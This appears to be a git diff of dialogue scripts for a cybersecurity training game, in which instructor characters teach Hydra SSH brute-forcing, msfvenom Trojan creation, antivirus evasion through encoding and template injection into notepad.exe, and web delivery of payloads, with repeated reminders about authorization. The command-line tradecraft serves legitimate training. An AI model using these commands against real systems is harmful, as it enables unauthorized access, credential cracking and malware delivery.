passwords. + +Tech Instructor: Basic usage: "hydra -l username -p password target ssh" + +Tech Instructor: Tests a single username/password combo. But Hydra's power is testing many combinations from wordlists. + +Tech Instructor: Supports dozens of protocols: SSH, FTP, HTTP, RDP, SMB, databases, and more. If it accepts login credentials, Hydra can probably attack it. + +* [How do I use wordlists?] + ~ bruteforce_basics_discussed = true + You: How do I test multiple passwords? + -> hydra_wordlists +* [How fast is Hydra?] + You: How quickly can it crack passwords? + -> hydra_speed +* [What are the legal/ethical considerations?] + You: Is this legal to use? + -> hydra_ethics +* [I'm ready to try it] + ~ completed_hydra_challenge = true + -> linux_training_hub + +=== hydra_wordlists === +~ instructor_rapport += 10 + +Tech Instructor: Wordlists are the fuel for Hydra. Collections of common passwords to test. + +Tech Instructor: Usage: "hydra -l username -P /path/to/wordlist.txt target ssh" + +Tech Instructor: Capital -P for password list, lowercase -l for single username. Or use -L for username list too. + +Tech Instructor: Kali includes wordlists: "ls /usr/share/wordlists/seclists/Passwords/" + +Tech Instructor: **Choosing the right wordlist is critical.** A wordlist with 10 million passwords might take days for online attacks. Start with smaller, curated lists of common passwords. + +Tech Instructor: For SSH specifically, "Common-Credentials" lists work well. They contain default passwords and common weak passwords. + +Tech Instructor: Real-world advice: online attacks are slow and noisy. They generate logs. They trigger intrusion detection. Use them strategically, not as your first approach. + +~ completed_hydra_challenge = true +~ instructor_rapport += 10 +-> linux_training_hub + +=== hydra_speed === +~ instructor_rapport += 8 + +Tech Instructor: Speed depends on many factors: network latency, server response time, number of parallel connections. + +Tech Instructor: Hydra's "-t" flag controls parallel tasks. "hydra -t 4" uses 4 parallel connections. + +Tech Instructor: More isn't always better. Too many parallel connections can crash services or trigger rate limiting. For SSH, 4-16 threads is usually reasonable. + +Tech Instructor: Realistic expectations: online SSH bruteforce might test 10-50 passwords per second. Against a wordlist with 10,000 passwords, that's several minutes at best. + +Tech Instructor: Compare to offline cracking (like hashcat on GPUs), which can test billions of passwords per second. Online attacks are fundamentally slower. + +Tech Instructor: Strategic implication: online attacks work best when you have good intelligence. If you know username is "admin" and password is probably from a short list of defaults, Hydra excels. Blind bruteforce against random accounts? Impractical. + +~ instructor_rapport += 8 +-> linux_training_hub + +=== hydra_ethics === +~ instructor_rapport += 10 + +Tech Instructor: Critical question. Shows good judgment. + +Tech Instructor: **Legal status:** Hydra itself is legal to possess and use in authorized security testing. Unauthorized use against systems you don't own or have explicit permission to test? That's computer fraud. Felony-level crime in most jurisdictions. + +Tech Instructor: **In this training:** You're attacking lab systems we control, with explicit permission. This is legal and ethical training. + +Tech Instructor: **In SAFETYNET operations:** You'll have authorization for your targets. Still legally gray area, but covered by classified operational authorities. + +Tech Instructor: **In the real world:** Never, ever use these tools against systems without written authorization. Penetration testers get contracts. Bug bounty hunters follow program rules. Hobbyists practice in their own isolated labs. + +Tech Instructor: The skills you're learning are powerful. Use them responsibly. With authorization. Within the law. That's not optional—it's core to professional security work. + +~ instructor_rapport += 15 +-> linux_training_hub + +// =========================================== +// COMMANDS REFERENCE +// =========================================== + +=== commands_reference === +~ instructor_rapport += 5 + +Tech Instructor: Here's your essential commands quick reference: + +Tech Instructor: **Navigation:** +- pwd (print working directory) +- ls, ls -la (list files, detailed) +- cd directory (change directory) +- cd .. (up one level), cd (home) + +Tech Instructor: **File Operations:** +- mkdir (make directory) +- cp source dest (copy), cp -r (recursive) +- mv old new (move/rename) +- cat filename (display file) +- less filename (scrollable view) +- echo "text" (print text) + +Tech Instructor: **Getting Help:** +- man command (manual page) +- info command (info page) +- command --help (quick help) + +Tech Instructor: **Text Processing:** +- grep pattern (filter lines) +- sort (sort lines) +- uniq (remove duplicates) +- head, tail (first/last lines) +- wc -l (count lines) + +Tech Instructor: **Networking:** +- ifconfig, ip a s (show interfaces) +- hostname -I (show IP) +- ssh user@host (remote shell) +- ssh -X user@host (X11 forwarding) + +Tech Instructor: **Security Tools:** +- hydra -l user -p pass target ssh (test SSH login) +- hydra -l user -P wordlist target ssh (bruteforce SSH) + ++ [Back to main menu] + -> linux_training_hub + +// =========================================== +// CHALLENGE TIPS +// =========================================== + +=== challenge_tips === +~ instructor_rapport += 5 + +Tech Instructor: Practical tips for the hands-on challenges: + +Tech Instructor: **For SSH practice:** +- Verify fingerprints before accepting +- Try both regular SSH and -X flag for X forwarding +- Use "exit" or Ctrl-D to disconnect +- Check "who" command to see who else is connected + +Tech Instructor: **For Hydra attacks:** +- Start with small, targeted wordlists from /usr/share/wordlists/seclists/Passwords/Common-Credentials/ +- Use -t 4 for reasonable parallel connections +- Be patient—online attacks are slow +- Watch for successful login messages +- Remember to actually SSH in once you crack credentials + +Tech Instructor: **For finding flags:** +- Navigate to user home directories +- Use "cat" to read files +- Remember "sudo" lets you act as root (if you have permission) +- Check file permissions with "ls -la" + +Tech Instructor: **General advice:** +- Use Tab completion to save typing +- Use up arrow to recall previous commands +- If stuck, check man pages +- Take notes on what works + ++ [Back to main menu] + -> linux_training_hub + +// =========================================== +// READY FOR PRACTICE +// =========================================== + +=== ready_for_practice === +~ instructor_rapport += 5 + +Tech Instructor: Excellent. You've covered the fundamentals. + +{command_line_skills_discussed and piping_discussed and redirection_discussed and ssh_discussed and hydra_discussed: + Tech Instructor: You've reviewed all the core material. You should be well-prepared for the practical exercises. +- else: + Tech Instructor: You might want to review the topics you haven't covered yet, but you've got enough to start. +} + +Tech Instructor: Remember: the best way to learn Linux is by doing. Read the challenges, try commands, make mistakes, figure out fixes. That's how you build real competence. + +Tech Instructor: Practical objectives: +1. Practice basic command-line navigation and file manipulation +2. Edit files with vi +3. Use piping and redirection +4. SSH between systems +5. Use Hydra to crack weak SSH credentials +6. Capture flags from compromised accounts + +Tech Instructor: The lab environment is yours to experiment in. Break things. It's a safe space for learning. + +{instructor_rapport >= 50: + Tech Instructor: You've asked great questions and engaged deeply with the material. That's exactly the right approach. You're going to do well. +} + +Tech Instructor: Good luck, Agent {player_name}. You've got this. + +-> end_session + +// =========================================== +// END SESSION +// =========================================== + +=== end_session === + +Tech Instructor: Whenever you need a refresher on Linux fundamentals, I'm here. + +{instructor_rapport >= 40: + Tech Instructor: You've demonstrated solid understanding and good security awareness. Keep that mindset. +} + +Tech Instructor: Now get to that terminal and start practicing. Theory is useful, but hands-on experience is how you actually learn. + +Tech Instructor: See you in the field, Agent. + +#exit_conversation +-> END diff --git a/story_design/ink/game_scenarios/malware_metasploit.ink b/story_design/ink/game_scenarios/malware_metasploit.ink new file mode 100644 index 0000000..48813b3 --- /dev/null +++ b/story_design/ink/game_scenarios/malware_metasploit.ink @@ -0,0 +1,654 @@ +// =========================================== +// MALWARE AND METASPLOIT LAB +// Introduction to Malware and Payloads +// =========================================== +// Game-Based Learning replacement for lab sheet +// Original: introducing_attacks/2_malware_msf_payloads.md +// =========================================== + +// Global persistent state +VAR instructor_rapport = 0 +VAR ethical_awareness = 0 + +// External variables +EXTERNAL player_name + +// =========================================== +// ENTRY POINT +// =========================================== + +=== start === +Malware Specialist: Welcome to Malware Analysis and Metasploit Fundamentals, Agent {player_name}. + +Malware Specialist: This lab covers malicious software - what it is, how it works, and how to create and analyze it in controlled environments. + +Malware Specialist: Before we begin, ethical boundaries reminder: everything we cover is for authorized penetration testing and security research. Creating or deploying malware against systems you don't have explicit permission to test is illegal. + +* [Understood - authorized testing only] + ~ ethical_awareness += 15 + You: Clear. Authorized environments, defensive purpose, professional responsibility. + Malware Specialist: Excellent. Let's proceed. + -> malware_hub +* [I understand the constraints] + ~ ethical_awareness += 5 + You: I understand the ethical boundaries. + Malware Specialist: Good. Keep that in mind throughout. + -> malware_hub + +// =========================================== +// MAIN HUB +// =========================================== + +=== malware_hub === +Malware Specialist: What aspect of malware and Metasploit would you like to explore? + ++ [Types of malware and classifications] + -> malware_types ++ [Introduction to Metasploit Framework] + -> metasploit_intro ++ [Creating payloads with msfvenom] + -> msfvenom_basics ++ [Anti-malware detection methods] + -> antimalware_detection ++ [Evasion techniques and polymorphic malware] + -> evasion_techniques ++ [Remote Access Trojans (RATs)] + -> rat_intro ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +// =========================================== +// MALWARE TYPES +// =========================================== + +=== malware_types === +~ instructor_rapport += 5 + +Malware Specialist: Malware - malicious software. Programs designed to carry out harmful actions. + +Malware Specialist: Microsoft's old TechNet essay put it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore." + +Malware Specialist: That's the core threat. A program running on your system has access to everything you have access to. If it runs as admin/root, even worse. + +* [What are the main types?] + You: How is malware classified? + -> malware_taxonomy +* [Why target Windows most?] + You: Why is Windows the primary target? + Malware Specialist: Market share. Windows dominates desktop OS usage. More targets means more potential victims. + Malware Specialist: Though macOS, Linux, Android, iOS all have malware too. Platform diversity is shifting the landscape. + Malware Specialist: Also, each Windows version adds security mitigations. We test on Windows 7 in labs because its mitigations are well-understood and bypassable for learning purposes. + ~ instructor_rapport += 5 + -> malware_types +* [Understood] + -> malware_hub + +=== malware_taxonomy === +~ instructor_rapport += 8 + +Malware Specialist: Main classifications: + +Malware Specialist: **Trojans** - malicious software posing as legitimate. Named after the Greek myth. A "game" that's actually a backdoor. +- Doesn't self-propagate +- May provide remote access (RAT - Remote Access Trojan) +- May spy on users (spyware, keyloggers) +- May force advertising (adware) + +Malware Specialist: **Viruses** - automatically spread to other programs on the same system. Infect executables, documents, boot sectors. + +Malware Specialist: **Worms** - automatically spread to other computers on the network. Self-propagating across systems via exploits, email, etc. + +Malware Specialist: **Rootkits** - hide the presence of infection. Manipulate OS to conceal malicious processes, files, network connections. + +Malware Specialist: **Zombies/Botnets** - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining. + +Malware Specialist: **Ransomware** - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity. + +* [Tell me more about Trojans] + You: Trojans seem most relevant to this lab? + Malware Specialist: Correct. We'll focus on creating Trojan horses - programs that appear innocent but perform malicious actions. + Malware Specialist: Social engineering is key. Convince victim to run it. No exploitation required if they willingly execute it. + ~ instructor_rapport += 8 + -> malware_hub +* [How do these overlap?] + You: Can malware be multiple types? + Malware Specialist: Absolutely. A Trojan worm that installs a rootkit, for example. + Malware Specialist: Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities. + Malware Specialist: Taxonomy helps us discuss and categorize, but real malware can be complex, multi-functional. + ~ instructor_rapport += 10 + -> malware_hub +* [Got it] + -> malware_hub + +// =========================================== +// METASPLOIT FRAMEWORK +// =========================================== + +=== metasploit_intro === +~ instructor_rapport += 5 + +Malware Specialist: Metasploit Framework - one of the most powerful penetration testing tools available. + +Malware Specialist: Contains extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools. Framework for developing custom exploits. + +Malware Specialist: Open source, maintained by Rapid7. Free framework version (what we use) and commercial Pro version with GUI. + +Malware Specialist: We're using command-line tools - teaches you more about concepts and mechanics. + +* [What can Metasploit do?] + You: What's the scope of Metasploit's capabilities? + Malware Specialist: Enormous scope: + - Exploit development and execution + - Payload generation (what we're focusing on) + - Post-exploitation (once you've compromised a system) + - Auxiliary modules (scanners, sniffers, fuzzers) + - Evasion and anti-forensics + ~ instructor_rapport += 8 + -> metasploit_intro +* [Why is it legal to distribute?] + You: How is this legal if it creates malware? + ~ ethical_awareness += 10 + Malware Specialist: Excellent question. Shows good critical thinking. + Malware Specialist: Metasploit is a *tool*. Hammer can build houses or break windows. The tool isn't illegal - misuse is. + Malware Specialist: Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises. + Malware Specialist: It's widely used by security professionals to identify weaknesses before attackers do. + ~ instructor_rapport += 15 + -> metasploit_intro +* [Tell me about payloads] + You: What exactly is a payload? + -> payload_explanation +* [Back to main menu] + -> malware_hub + +=== payload_explanation === +~ instructor_rapport += 8 + +Malware Specialist: Payload - the malicious code you want to execute on a victim's system. + +Malware Specialist: The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access. + +Malware Specialist: Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access. + +Malware Specialist: msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code. + +* [How do I see available payloads?] + You: How many payloads exist? + Malware Specialist: `msfvenom -l payloads | less` lists them all. Hundreds. + Malware Specialist: Platform-specific: windows, linux, osx, android, etc. + Malware Specialist: Various functions: shells, meterpreter, exec commands, VNC, etc. + Malware Specialist: Each has configurable options for IP addresses, ports, usernames, etc. + ~ instructor_rapport += 5 + -> payload_explanation +* [What's the simplest payload?] + You: What's a basic example? + Malware Specialist: `windows/adduser` - simply adds a user account to Windows. + Malware Specialist: Configuration: USER= (username), PASS= (password) + Malware Specialist: Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe` + Malware Specialist: Victim runs trojan.exe, new admin account created. Simple, effective Trojan. + ~ instructor_rapport += 5 + -> payload_explanation +* [Understood] + -> metasploit_intro + +// =========================================== +// MSFVENOM BASICS +// =========================================== + +=== msfvenom_basics === +~ instructor_rapport += 5 + +Malware Specialist: msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality. + +Malware Specialist: Generates standalone payloads in various formats: executables, shellcode, scripts, etc. + +Malware Specialist: Basic workflow: +1. Choose payload +2. Configure options +3. Select output format +4. Generate file + +* [Walk me through creating a Trojan] + You: Show me the complete process. + -> trojan_creation_walkthrough +* [What output formats exist?] + You: What formats can msfvenom generate? + Malware Specialist: `msfvenom -l formats` lists them all. + Malware Specialist: Common formats: + - exe: Windows executable + - elf: Linux executable + - dll: Windows library + - python, ruby, perl: Scripts in various languages + - c, java: Source code + - raw: Raw shellcode + Malware Specialist: Choose format based on target platform and delivery method. + ~ instructor_rapport += 8 + -> msfvenom_basics +* [How do I configure payloads?] + You: What about payload options? + Malware Specialist: `msfvenom -p payload_name --list-options` shows available options. + Malware Specialist: Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc. + Malware Specialist: Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123` + ~ instructor_rapport += 5 + -> msfvenom_basics +* [Back to main menu] + -> malware_hub + +=== trojan_creation_walkthrough === +~ instructor_rapport += 10 + +Malware Specialist: Complete Trojan creation example: + +Malware Specialist: **Step 1:** Choose payload +`msfvenom -l payloads | grep windows/adduser` + +Malware Specialist: **Step 2:** Check options +`msfvenom -p windows/adduser --list-options` + +Malware Specialist: **Step 3:** Generate executable +`msfvenom -p windows/adduser USER=backdoor PASS=SecurePass123 -f exe > game.exe` + +Malware Specialist: **Step 4:** Deliver to victim (in lab: web server) +`sudo cp game.exe /var/www/html/share/` +`sudo service apache2 start` + +Malware Specialist: **Step 5:** Victim downloads and runs game.exe +(Social engineering: "Free game! Click to play!") + +Malware Specialist: **Step 6:** Verify success +On victim system: `net user` shows new backdoor account + +Malware Specialist: That's the basic flow. Simple but effective if victim trusts you enough to run the file. + +* [How do I make it less suspicious?] + You: How do I make it seem legitimate? + Malware Specialist: Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality. + Malware Specialist: We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality. + ~ instructor_rapport += 10 + -> msfvenom_basics +* [What about detection?] + You: Won't anti-malware catch this? + Malware Specialist: Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware. + Malware Specialist: That's why we need evasion techniques - encoding, obfuscation, template injection. + -> antimalware_detection +* [Clear walkthrough] + -> msfvenom_basics + +// =========================================== +// ANTI-MALWARE DETECTION +// =========================================== + +=== antimalware_detection === +~ instructor_rapport += 5 + +Malware Specialist: Anti-malware software - defensive tools attempting to detect and block malicious software. + +Malware Specialist: Two main detection approaches: signature-based and anomaly-based. + +* [Explain signature-based detection] + You: How does signature-based detection work? + -> signature_based +* [Explain anomaly-based detection] + You: How does anomaly-based detection work? + -> anomaly_based +* [How do I test against anti-malware?] + You: How can I test my payloads? + Malware Specialist: ClamAV - open-source anti-malware scanner. + Malware Specialist: `clamscan` scans current directory for malware. + Malware Specialist: Basic msfvenom payloads get detected immediately. Tells you if your evasion worked. + Malware Specialist: VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security. + ~ instructor_rapport += 8 + -> antimalware_detection +* [Back to main menu] + -> malware_hub + +=== signature_based === +~ instructor_rapport += 8 + +Malware Specialist: Signature-based detection - blacklist of known malware patterns. + +Malware Specialist: **How it works:** +- Malware researchers analyze malicious code +- Extract unique signatures (byte patterns, hashes, code structures) +- Add to signature database +- Scanner compares files against database + +Malware Specialist: **Advantages:** +- High accuracy for known threats +- Low false positive rate +- Resource efficient +- Mature, well-understood technology + +Malware Specialist: **Disadvantages:** +- Useless against unknown malware (zero-days) +- Requires constant signature updates +- Polymorphic malware can evade (same function, different code) +- Always reactive, never proactive + +* [How do hashes relate to signatures?] + ~ instructor_rapport += 10 + You: You mentioned hashes earlier? + Malware Specialist: Simple signature approach: hash the entire malware file. + Malware Specialist: `sha256sum malware.exe` produces unique fingerprint. + Malware Specialist: Change one byte? Completely different hash. That's the evasion opportunity. + Malware Specialist: Re-encode payload → different file → different hash → evades hash-based detection. + Malware Specialist: Modern scanners use more sophisticated signatures than simple hashes, but principle remains. + ~ instructor_rapport += 10 + -> signature_based +* [Understood] + -> antimalware_detection + +=== anomaly_based === +~ instructor_rapport += 8 + +Malware Specialist: Anomaly-based detection - identifies malicious behavior rather than known signatures. + +Malware Specialist: **How it works:** +- Establish baseline of normal system behavior +- Monitor processes, registry changes, network connections, file access +- Flag deviations from normal as potentially malicious +- May use machine learning, heuristics, behavioral analysis + +Malware Specialist: **Advantages:** +- Detects unknown threats (zero-days) +- Adapts to new attack methods +- More comprehensive than signature matching +- Less dependent on frequent updates + +Malware Specialist: **Disadvantages:** +- False positives (legitimate software flagged) +- Complex implementation and tuning +- Resource intensive (continuous monitoring) +- Difficult to establish baseline (what's "normal"?) + +* [Give me an example] + You: What behaviors trigger anomaly detection? + Malware Specialist: Suspicious patterns: + - Process creating multiple network connections + - Modification of system files + - Injection into other processes + - Encryption of large numbers of files (ransomware behavior) + - Keylogging-like keyboard hooks + - Persistence mechanisms (registry keys, startup folders) + Malware Specialist: Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly. + ~ instructor_rapport += 10 + -> anomaly_based +* [Which is better?] + You: Which detection method is superior? + Malware Specialist: Both. Modern anti-malware uses layered approach. + Malware Specialist: Signature-based catches known threats efficiently. Anomaly-based catches unknowns. + Malware Specialist: Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth. + Malware Specialist: No single method is perfect. Combine multiple for better coverage. + ~ instructor_rapport += 10 + -> anomaly_based +* [Got it] + -> antimalware_detection + +// =========================================== +// EVASION TECHNIQUES +// =========================================== + +=== evasion_techniques === +~ instructor_rapport += 5 + +Malware Specialist: Evasion - making malware undetectable to anti-malware scanners. + +Malware Specialist: Key techniques: encoding, obfuscation, template injection, packing, encryption. + +Malware Specialist: Goal: change how malware looks without changing what it does. + +* [Explain encoding] + You: How does encoding help evasion? + -> encoding_evasion +* [Explain template injection] + You: What's template injection? + -> template_injection +* [What's polymorphic malware?] + You: You mentioned polymorphic malware earlier? + Malware Specialist: Polymorphic malware - changes its appearance while maintaining functionality. + Malware Specialist: Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime. + Malware Specialist: Each iteration looks different (different encoding, different decryptor), but does the same thing. + Malware Specialist: This is what msfvenom encoders create - polymorphic payloads. + ~ instructor_rapport += 10 + -> evasion_techniques +* [Back to main menu] + -> malware_hub + +=== encoding_evasion === +~ instructor_rapport += 10 + +Malware Specialist: Encoding for evasion - re-encode payload so file looks different but executes identically. + +Malware Specialist: msfvenom supports multiple encoders. View list: `msfvenom -l encoders` + +Malware Specialist: Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder) + +Malware Specialist: Usage: +`msfvenom -p windows/adduser USER=test PASS=pass123 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe` + +Malware Specialist: `-e` specifies encoder, `-i` specifies iterations (encode 10 times) + +* [Does more encoding help?] + You: Is 10 iterations better than 1? + Malware Specialist: Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures. + Malware Specialist: Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis. + Malware Specialist: 5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective. + ~ instructor_rapport += 8 + -> encoding_evasion +* [Can I chain encoders?] + You: Can I use multiple different encoders? + Malware Specialist: Absolutely. Pipe msfvenom outputs: + `msfvenom -p payload -e encoder1 -i 3 | msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe` + Malware Specialist: Each encoder transforms output differently. Chaining increases obfuscation. + Malware Specialist: Though again, modern AV looks deeper than surface encoding. + ~ instructor_rapport += 10 + -> encoding_evasion +* [Understood] + -> evasion_techniques + +=== template_injection === +~ instructor_rapport += 10 + +Malware Specialist: Template injection - embedding payload inside legitimate executable. + +Malware Specialist: Makes malware look like real software. Both malicious code AND original program execute. + +Malware Specialist: msfvenom `-x` flag specifies template executable: +`msfvenom -p windows/exec CMD='net user /add hacker pass123' -x notepad.exe -f exe > my_notepad.exe` + +Malware Specialist: Result: executable that opens Notepad (seems normal) while also adding user account (malicious). + +* [Why is this effective?] + You: How does this evade detection? + Malware Specialist: Several reasons: + - File structure resembles legitimate program + - Contains real code from original program + - Signature scanners see legitimate program signatures too + - Behavioral analysis sees expected behavior (Notepad opens) alongside malicious + Malware Specialist: Not perfect, but more effective than bare encoded payload. + ~ instructor_rapport += 10 + -> template_injection +* [What programs make good templates?] + You: Which programs should I use as templates? + Malware Specialist: Context-dependent. Match victim's expectations: + - Games for game-focused social engineering + - Utilities (calc.exe, notepad.exe) for general purpose + - Industry-specific software for targeted attacks + Malware Specialist: Smaller files better (less suspicious download size). + Malware Specialist: Legitimate signed programs add credibility. + ~ instructor_rapport += 8 + -> template_injection +* [Can I combine encoding and templates?] + You: Can I use both techniques together? + Malware Specialist: Absolutely recommended. Encode first, then inject into template: + `msfvenom -p payload -e encoder -i 7 | msfvenom -x template.exe -f exe > output.exe` + Malware Specialist: Layered evasion: encoding changes signature, template adds legitimacy. + Malware Specialist: In practice: well-encoded, template-injected payloads evade many scanners. + ~ instructor_rapport += 10 + -> template_injection +* [Got it] + -> evasion_techniques + +// =========================================== +// REMOTE ACCESS TROJANS +// =========================================== + +=== rat_intro === +~ instructor_rapport += 5 + +Malware Specialist: Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system. + +Malware Specialist: Classic architecture: client-server model. +- Server (victim runs this): listens for connections, executes commands +- Client (attacker uses this): connects to server, sends commands + +Malware Specialist: RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation. + +* [How do RATs differ from what we've done?] + You: How is this different from adduser payload? + Malware Specialist: adduser is single-action. Runs once, adds user, exits. + Malware Specialist: RAT provides persistent, interactive access. Attacker can issue multiple commands over time. + Malware Specialist: More powerful, more flexible, more risk if detected. + ~ instructor_rapport += 8 + -> rat_intro +* [What Metasploit payloads create RATs?] + You: Which payloads provide remote access? + Malware Specialist: Several options: + - windows/meterpreter/reverse_tcp - full-featured RAT + - windows/shell/reverse_tcp - simple command shell + - windows/vnc/reverse_tcp - graphical remote access + Malware Specialist: Meterpreter is most powerful - extensive post-exploitation features. + Malware Specialist: Reverse shells covered in later labs. Advanced topic. + ~ instructor_rapport += 8 + -> rat_intro +* [Why "reverse"?] + You: What does "reverse" mean in reverse_tcp? + Malware Specialist: Normal: attacker connects TO victim (requires open port on victim, often firewalled). + Malware Specialist: Reverse: victim connects TO attacker (outbound connections usually allowed). + Malware Specialist: Victim initiates connection, attacker listens. Bypasses most firewalls. + Malware Specialist: Essential technique for real-world scenarios where victims are behind NAT/firewalls. + ~ instructor_rapport += 10 + -> rat_intro +* [Understood] + -> malware_hub + +// =========================================== +// COMMANDS REFERENCE +// =========================================== + +=== commands_reference === +Malware Specialist: Quick reference for Metasploit and malware-related commands: + +Malware Specialist: **msfvenom basics:** +- List payloads: `msfvenom -l payloads` +- List encoders: `msfvenom -l encoders` +- List formats: `msfvenom -l formats` +- Show options: `msfvenom -p payload_name --list-options` + +Malware Specialist: **Creating payloads:** +- Basic: `msfvenom -p windows/adduser USER=name PASS=pass -f exe > trojan.exe` +- Encoded: `msfvenom -p payload -e x86/shikata_ga_nai -i 10 -f exe > output.exe` +- With template: `msfvenom -p payload -x template.exe -f exe > output.exe` +- Combined: `msfvenom -p payload -e encoder -i 5 | msfvenom -x template.exe -f exe > final.exe` + +Malware Specialist: **Testing payloads:** +- Hash file: `sha256sum filename.exe` +- Scan with ClamAV: `clamscan` +- Scan specific file: `clamscan filename.exe` + +Malware Specialist: **Web server (payload delivery):** +- Create share directory: `sudo mkdir /var/www/html/share` +- Copy payload: `sudo cp malware.exe /var/www/html/share/` +- Start Apache: `sudo service apache2 start` +- Access from victim: http://KALI_IP/share/malware.exe + +Malware Specialist: **Windows victim verification:** +- List users: `net user` +- Check specific user: `net user username` + ++ [Back to main menu] + -> malware_hub + +// =========================================== +// CHALLENGE TIPS +// =========================================== + +=== challenge_tips === +Malware Specialist: Practical tips for lab challenges: + +Malware Specialist: **Creating effective Trojans:** +- Start simple (windows/adduser or windows/exec) +- Test unencoded version first to ensure payload works +- Then add encoding, check if detection increases +- Finally try template injection for best evasion + +Malware Specialist: **Evasion tips:** +- Experiment with different encoders and iteration counts +- Shikata_ga_nai is popular but widely signatured - try others +- Chain multiple encoders for better results +- Use legitimate programs as templates (notepad, calc, small utilities) +- Test against ClamAV before trying against victim +- Don't upload to VirusTotal if you want evasion to last (shares sample with AV vendors) + +Malware Specialist: **Delivery tips:** +- Make filename convincing (game.exe, important_document.exe, update.exe) +- Social engineering matters - victim needs reason to run it +- In real scenarios: icons, file properties, code signing all add legitimacy +- For lab: simple web delivery works fine + +Malware Specialist: **Verification:** +- Windows: `net user` shows created accounts +- Check Admin group: `net localgroup administrators` +- If payload fails, check syntax and password complexity requirements +- Passwords need: uppercase, lowercase, numbers (e.g., SecurePass123) + +Malware Specialist: **Troubleshooting:** +- Payload doesn't work? Test simpler version without encoding +- Still detected by AV? Try different template or more encoding iterations +- Apache won't start? `sudo service apache2 status` for error info +- Can't download from Kali? Check IP address (`ip a`) and firewall rules + +{instructor_rapport >= 50: + Malware Specialist: You've engaged deeply with the material and asked excellent questions. You're well-prepared for the practical exercises. +} + ++ [Back to main menu] + -> malware_hub + +// =========================================== +// READY FOR PRACTICE +// =========================================== + +=== ready_for_practice === +Malware Specialist: Good. You've covered the core concepts. + +Malware Specialist: Lab objectives: +1. Create basic Trojan using msfvenom +2. Test against anti-malware (ClamAV) +3. Use encoding to evade detection +4. Inject payload into legitimate program template +5. Deliver via web server to Windows victim +6. Verify successful exploitation + +{ethical_awareness >= 10: + Malware Specialist: You've demonstrated solid ethical awareness. Remember: controlled lab environment, authorized testing only. +} + +Malware Specialist: The skills you're learning are powerful. Metasploit is used by professional penetration testers worldwide. + +Malware Specialist: But also by criminals. The difference is authorization and intent. + +Malware Specialist: You're learning these techniques to defend against them - to understand attacker methods, test organizational defenses, and improve security posture. + +Malware Specialist: One final reminder: creating or deploying malware against unauthorized systems is computer fraud. Felony-level crime. Only use these skills in authorized contexts: penetration testing contracts, security research, education labs, your own isolated systems. + +Malware Specialist: Now go create some Trojans. Good luck, Agent {player_name}. + +#exit_conversation +-> END diff --git a/story_design/ink/game_scenarios/phishing_social_engineering.ink b/story_design/ink/game_scenarios/phishing_social_engineering.ink new file mode 100644 index 0000000..fc690ef --- /dev/null +++ b/story_design/ink/game_scenarios/phishing_social_engineering.ink @@ -0,0 +1,967 @@ +// =========================================== +// PHISHING AND SOCIAL ENGINEERING LAB +// Human Factors and Social Engineering +// =========================================== +// Game-Based Learning replacement for lab sheet +// Original: cyber_security_landscape/3_phishing.md +// =========================================== + +// Progress tracking +VAR intro_human_factors_discussed = false +VAR phishing_basics_discussed = false +VAR reconnaissance_discussed = false +VAR email_spoofing_discussed = false +VAR malicious_attachments_discussed = false +VAR macros_discussed = false +VAR executables_discussed = false +VAR reverse_shells_discussed = false +VAR ethics_discussed = false + +// Detailed topics +VAR weakest_link_discussed = false +VAR spear_phishing_discussed = false +VAR attachment_types_discussed = false +VAR macro_creation_discussed = false +VAR msfvenom_discussed = false +VAR netcat_listener_discussed = false + +// Challenge tracking +VAR completed_reconnaissance = false +VAR completed_first_phish = false +VAR completed_spoofing = false +VAR completed_attachment = false + +// Instructor relationship +VAR instructor_rapport = 0 +VAR ethical_awareness_shown = false + +// External variables +EXTERNAL player_name + +// =========================================== +// ENTRY POINT - SOCIAL ENGINEERING SPECIALIST +// =========================================== + +=== start === +~ instructor_rapport = 0 + +Social Engineering Specialist: Welcome, Agent {player_name}. I'm your instructor for human factors and social engineering. + +Social Engineering Specialist: This module covers a critical truth: the human element is often the most exploitable component of any security system. Technical defenses don't matter if an attacker can convince a user to bypass them. + +Social Engineering Specialist: Before we begin—this training covers offensive techniques. Everything we discuss is for authorized security testing within controlled environments. These skills exist to help organizations identify and remediate human vulnerabilities. + +Social Engineering Specialist: Clear on that? We're learning these techniques to defend against them, and to conduct authorized penetration tests. + +* [Absolutely. I understand the ethical boundaries] + ~ ethical_awareness_shown = true + ~ instructor_rapport += 15 + You: Understood completely. Authorized testing only, controlled environments, defensive purpose. + Social Engineering Specialist: Perfect. That's exactly the mindset we need. Let's begin. + -> social_engineering_hub +* [Yes, I'm clear on the scope] + ~ instructor_rapport += 5 + You: Clear on the ethical constraints. + Social Engineering Specialist: 